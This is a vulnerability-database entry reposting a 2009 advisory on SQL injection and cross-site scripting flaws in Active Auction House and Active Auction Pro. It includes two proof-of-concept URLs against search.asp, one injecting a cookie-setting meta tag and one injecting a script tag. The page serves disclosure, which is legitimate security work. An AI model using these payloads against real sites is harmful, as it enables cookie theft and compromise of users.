Recent Vulnerabilities Product List Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2009-0430

Publish Date: 15 Jan 2009

                source: http://www.securityfocus.com/bid/33306/info


Active Auction House and Active Auction Pro are prone to SQL-injection and cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/[Path]/search.asp?search=&lt;meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'&gt;&amp;submit=%3E

http://www.example.com/[Path]/search.asp?search=&gt;"&gt;&lt;ScRiPt%20%0a%0d&gt;alert(1369)%3B&lt;/ScRiPt&gt;&amp;submit=%3E

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Product List Vendor List Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Active Bids - 'search' Cross-Site Scripting

Vulmon Search

About

Products

Connect